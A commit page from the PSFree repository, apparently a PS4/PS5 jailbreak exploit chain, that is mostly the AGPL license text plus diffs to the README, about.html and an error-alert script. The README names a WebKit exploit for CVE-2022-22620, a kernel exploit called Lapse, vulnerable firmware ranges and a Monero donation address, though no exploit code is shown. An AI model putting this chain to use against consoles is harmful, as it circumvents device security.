Seth/PSFree
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update to psfree-1.5rc1

Browse Source 
900 Port in process: DO NOT USE IT.
This commit is contained in:
Kameleon
2025-05-10 09:34:58 -06:00
parent 32fa2d5d8c
commit 1220a577a2
30 changed files with 5271 additions and 2723 deletions
Download Patch File Download Diff File Expand all files Collapse all files
COPYING
+661
View File
@@ -0,0 +1,661 @@
GNU AFFERO GENERAL PUBLIC LICENSE
Version 3, 19 November 2007
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU Affero General Public License is a free, copyleft license for
software and other kinds of works, specifically designed to ensure
cooperation with the community in the case of network server software.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
our General Public Licenses are intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
Developers that use our General Public Licenses protect your rights
with two steps: (1) assert copyright on the software, and (2) offer
you this License which gives you legal permission to copy, distribute
and/or modify the software.
A secondary benefit of defending all users' freedom is that
improvements made in alternate versions of the program, if they
receive widespread use, become available for other developers to
incorporate. Many developers of free software are heartened and
encouraged by the resulting cooperation. However, in the case of
software used on network servers, this result may fail to come about.
The GNU General Public License permits making a modified version and
letting the public access it on a server without ever releasing its
source code to the public.
The GNU Affero General Public License is designed specifically to
ensure that, in such cases, the modified source code becomes available
to the community. It requires the operator of a network server to
provide the source code of the modified version running there to the
users of that server. Therefore, public use of a modified version, on
a publicly accessible server, gives the public access to the source
code of the modified version.
An older license, called the Affero General Public License and
published by Affero, was designed to accomplish similar goals. This is
a different license, not a version of the Affero GPL, but Affero has
released a new version of the Affero GPL which permits relicensing under
this license.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU Affero General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work. For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.
When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified
it, and giving a relevant date.
b) The work must carry prominent notices stating that it is
released under this License and any conditions added under section
7. This requirement modifies the requirement in section 4 to
"keep intact all notices".
c) You must license the entire work, as a whole, under this
License to anyone who comes into possession of a copy. This
License will therefore apply, along with any applicable section 7
additional terms, to the whole of the work, and all its parts,
regardless of how they are packaged. This License gives no
permission to license the work in any other way, but it does not
invalidate such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display
Appropriate Legal Notices; however, if the Program has interactive
interfaces that do not display Appropriate Legal Notices, your
work need not make them do so.
A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit. Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:
a) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by the
Corresponding Source fixed on a durable physical medium
customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by a
written offer, valid for at least three years and valid for as
long as you offer spare parts or customer support for that product
model, to give anyone who possesses the object code either (1) a
copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical
medium customarily used for software interchange, for a price no
more than your reasonable cost of physically performing this
conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the
written offer to provide the Corresponding Source. This
alternative is allowed only occasionally and noncommercially, and
only if you received the object code with such an offer, in accord
with subsection 6b.
d) Convey the object code by offering access from a designated
place (gratis or for a charge), and offer equivalent access to the
Corresponding Source in the same way through the same place at no
further charge. You need not require recipients to copy the
Corresponding Source along with the object code. If the place to
copy the object code is a network server, the Corresponding Source
may be on a different server (operated by you or a third party)
that supports equivalent copying facilities, provided you maintain
clear directions next to the object code saying where to find the
Corresponding Source. Regardless of what server hosts the
Corresponding Source, you remain obligated to ensure that it is
available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided
you inform other peers where the object code and Corresponding
Source of the work are being offered to the general public at no
charge under subsection 6d.
A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.
A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling. In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage. For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product. A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.
"Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source. The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.
If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information. But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).
The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed. Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.
Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law. If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it. (Additional permissions may be written to require their own
removal in certain cases when you modify the work.) You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.
Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the
terms of sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or
author attributions in that material or in the Appropriate Legal
Notices displayed by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or
requiring that modified versions of such material be marked in
reasonable ways as different from the original version; or
d) Limiting the use for publicity purposes of names of licensors or
authors of the material; or
e) Declining to grant rights under trademark law for use of some
trade names, trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that
material by anyone who conveys the material (or modified versions of
it) with contractual assumptions of liability to the recipient, for
any liability that these contractual assumptions directly impose on
those licensors and authors.
All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10. If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term. If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly
provided under this License. Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.
Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License. If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or
run a copy of the Program. Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance. However,
nothing other than this License grants you permission to propagate or
modify any covered work. These actions infringe copyright if you do
not accept this License. Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License. You are not responsible
for enforcing compliance by third parties with this License.
An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations. If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License. For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based. The
work thus licensed is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version. For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.
Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.
In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement). To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.
If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients. "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.
If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.
A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License. You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.
13. Remote Network Interaction; Use with the GNU General Public License.
Notwithstanding any other provision of this License, if you modify the
Program, your modified version must prominently offer all users
interacting with it remotely through a computer network (if your version
supports such interaction) an opportunity to receive the Corresponding
Source of your version by providing access to the Corresponding Source
from a network server at no charge, through some standard or customary
means of facilitating copying of software. This Corresponding Source
shall include the Corresponding Source for any work covered by version 3
of the GNU General Public License that is incorporated pursuant to the
following paragraph.
Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU General Public License into a single
combined work, and to convey the resulting work. The terms of this
License will continue to apply to the part which is the covered work,
but the work with which it is combined will remain governed by version
3 of the GNU General Public License.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU Affero General Public License from time to time. Such new versions
will be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU Affero General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU Affero General Public License, you may choose any version ever published
by the Free Software Foundation.
If the Program specifies that a proxy can decide which future
versions of the GNU Affero General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If your software can interact with users remotely through a computer
network, you should also make sure that it provides a way for users to
get its source. For example, if your program is a web application, its
interface could display a "Source" link that leads users to an archive
of the code. There are many ways you could offer source, and different
solutions will be better for different programs; see section 13 for the
specific requirements.
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU AGPL, see
<https://www.gnu.org/licenses/>.
README.md
+16 -29
View File
@@ -1,33 +1,20 @@
PSFree version 1.4.0 # PSFree version 1.5.0
PSFree is a WebKit exploit using CVE-2022-22620 to gain arbitrary read/write. PSFree is a collection of exploits for the PS4 console. The main focus of the
repo is for the PS4 but we try to make things portable to PS5.
vulnerable: * Exploits
* PS4 6.xx-9.xx (tested 6.00-9.60) * PSFree: src/psfree.mjs
* PS5 1.xx-5.xx (tested 1.00-5.50) * Lapse (kernel): src/scripts/lapse.mjs
CREDITS: Donation (Monero/XMR):
86Fk3X9AE94EGKidzRbvyiVgGNYD3qZnuKNq1ZbsomFWXHYm6TtAgz9GNGitPWadkS3Wr9uXoT29U1SfdMtJ7QNKQpW1CVS
# COPYRIGHT AND AUTHORS:
AGPL-3.0-or-later (see src/COPYING). This repo belongs to the group
`anonymous`. We refer to anonymous contributors as "anonymous" as well.
# CREDITS:
* anonymous for PS4 firmware kernel dumps * anonymous for PS4 firmware kernel dumps
* Check the appropriate files for any **extra** contributors. Unless otherwise
* janisslsm from ps4-dev on discord.com stated, everything here can also be credited to us.
* contributed ROP chain managers for 8.5x and 9.0x
* contributer of the ROP chain manager for 9.5x
* Helped in figuring out the size of JSC::ArrayBufferContents and its needed
offsets on different firmwares.
* barooney from ps4-dev on discord.com
* contributer of the ROP chain manager for 9.5x
* CelesteBlue from ps4-dev on discord.com
* Helped in figuring out the size of WebCore::SerializedScriptValue and its
needed offsets on different firmwares.
* figured out the range of vulnerable firmwares
* Kameleon_ from ps4-dev discord
* Asked people to test 1.3.0 (beta) on other firmwares and reported if the
peformance boost worked (reports from 6.72-9.60).
* Quentin Meffre (@0xdagger) and Mehdi Talbi (@abu_y0ussef) for the 6.xx
buildBubbleTree() UaF exploit that served as the framework for the exploit.
* Maddie Stone for the CVE writeup
about.html
+18 -24
View File
@@ -1,4 +1,4 @@
<!-- Copyright (C) 2023-2024 anonymous <!-- Copyright (C) 2023-2025 anonymous
This file is part of PSFree. This file is part of PSFree.
@@ -21,7 +21,7 @@ along with this program. If not, see <https://www.gnu.org/licenses/>.
<title>About PSFree</title> <title>About PSFree</title>
</head> </head>
<body> <body>
PSFree is a WebKit exploit for PS4 Firmware 8.03.<br> PSFree is an exploit chain for PS4 and PS5.<br>
PSFree is free software. See <a href='./COPYING'>COPYING</a> for the copyleft information.<br> PSFree is free software. See <a href='./COPYING'>COPYING</a> for the copyleft information.<br>
PSFree's license is GNU-AGPL-3.0-or-later.<br> PSFree's license is GNU-AGPL-3.0-or-later.<br>
Here is the source code of this program:<br> Here is the source code of this program:<br>
@@ -31,6 +31,11 @@ along with this program. If not, see <https://www.gnu.org/licenses/>.
<a href='./about.html' download>about.html</a><br> <a href='./about.html' download>about.html</a><br>
JavaScript files:<br> JavaScript files:<br>
<table id="jslicense-labels1"> <table id="jslicense-labels1">
<tr>
<td><a href="./psfree.mjs">psfree.mjs</a></td>
<td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
<td><a href="./psfree.mjs" download>download</a></td>
</tr>
<tr> <tr>
<td><a href="./alert.mjs">alert.mjs</a></td> <td><a href="./alert.mjs">alert.mjs</a></td>
<td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td> <td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
@@ -41,36 +46,21 @@ along with this program. If not, see <https://www.gnu.org/licenses/>.
<td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td> <td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
<td><a href="./config.mjs" download>download</a></td> <td><a href="./config.mjs" download>download</a></td>
</tr> </tr>
<tr>
<td><a href="./exploit.mjs">exploit.mjs</a></td>
<td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
<td><a href="./exploit.mjs" download>download</a></td>
</tr>
<tr> <tr>
<td><a href="./send.mjs">send.mjs</a></td> <td><a href="./send.mjs">send.mjs</a></td>
<td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td> <td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
<td><a href="./send.mjs" download>download</a></td> <td><a href="./send.mjs" download>download</a></td>
</tr> </tr>
<tr>
<td><a href="./scripts/lapse.mjs">scripts/lapse.mjs</a></td>
<td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
<td><a href="./scripts/lapse.mjs" download>download</a></td>
</tr>
<tr> <tr>
<td><a href="./rop/800.mjs">rop/800.mjs</a></td> <td><a href="./rop/800.mjs">rop/800.mjs</a></td>
<td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td> <td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
<td><a href="./rop/800.mjs" download>download</a></td> <td><a href="./rop/800.mjs" download>download</a></td>
</tr> </tr>
<tr>
<td><a href="./rop/950.mjs">rop/950.mjs</a></td>
<td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
<td><a href="./rop/950.mjs" download>download</a></td>
</tr>
<tr>
<td><a href="./rop/850.mjs">rop/850.mjs</a></td>
<td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
<td><a href="./rop/850.mjs" download>download</a></td>
</tr>
<tr>
<td><a href="./rop/900.mjs">rop/900.mjs</a></td>
<td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
<td><a href="./rop/900.mjs" download>download</a></td>
</tr>
<tr> <tr>
<td><a href="./module/chain.mjs">module/chain.mjs</a></td> <td><a href="./module/chain.mjs">module/chain.mjs</a></td>
<td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td> <td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
@@ -82,9 +72,9 @@ along with this program. If not, see <https://www.gnu.org/licenses/>.
<td><a href="./module/int64.mjs" download>download</a></td> <td><a href="./module/int64.mjs" download>download</a></td>
</tr> </tr>
<tr> <tr>
<td><a href="./module/constants.mjs">module/constants.mjs</a></td> <td><a href="./module/view.mjs">module/view.mjs</a></td>
<td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td> <td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
<td><a href="./module/constants.mjs" download>download</a></td> <td><a href="./module/view.mjs" download>download</a></td>
</tr> </tr>
<tr> <tr>
<td><a href="./module/memtools.mjs">module/memtools.mjs</a></td> <td><a href="./module/memtools.mjs">module/memtools.mjs</a></td>
@@ -118,5 +108,9 @@ along with this program. If not, see <https://www.gnu.org/licenses/>.
<a href="./kpatch/Makefile">kpatch/Makefile</a><br> <a href="./kpatch/Makefile">kpatch/Makefile</a><br>
<a href="./kpatch/80x.c">kpatch/80x.c</a><br> <a href="./kpatch/80x.c">kpatch/80x.c</a><br>
<a href="./kpatch/types.h">kpatch/types.h</a><br> <a href="./kpatch/types.h">kpatch/types.h</a><br>
fonts/ files:<br>
<a href="./fonts/README.txt">fonts/README.txt</a><br>
<a href="./fonts/FONTS.LICENSE">fonts/FONTS.LICENSE</a><br>
<a href="./fonts/LiberationMono-Regular.ttf">fonts/LiberationMono-Regular.ttf</a><br>
</body> </body>
</html> </html>
alert.mjs
+29 -15
View File
@@ -1,4 +1,4 @@
/* Copyright (C) 2023-2024 anonymous /* Copyright (C) 2023-2025 anonymous
This file is part of PSFree. This file is part of PSFree.
@@ -16,23 +16,37 @@ You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>. */ along with this program. If not, see <https://www.gnu.org/licenses/>. */
// We can't just open a console on the ps4 browser, make sure the errors thrown // We can't just open a console on the ps4 browser, make sure the errors thrown
// by our modules are alerted. We use alert() instead of debug_log() because // by our program are alerted.
// while we are developing, we may modify the utils.mjs module and introduce
// bugs. We can not use debug_log() if it throws an error. // We don't use a custom logging function to avoid a dependency on a logging
// // module since we want this file to stand alone. We don't want to copy the
// We added this new file instead of putting this on run.mjs, so we can ensure // log function here either for the sake avoiding dependencies since using
// we can attach this listener first before running anything. // alert() is good enough.
addEventListener('unhandledrejection', (event) => {
// We log the line and column numbers as well since some exceptions (like
// SyntaxError) do not show it in the stack trace.
addEventListener('unhandledrejection', event => {
const reason = event.reason; const reason = event.reason;
// We log the line and column numbers as well since some exceptions (like
// SyntaxError) do not show it in the stack trace.
alert( alert(
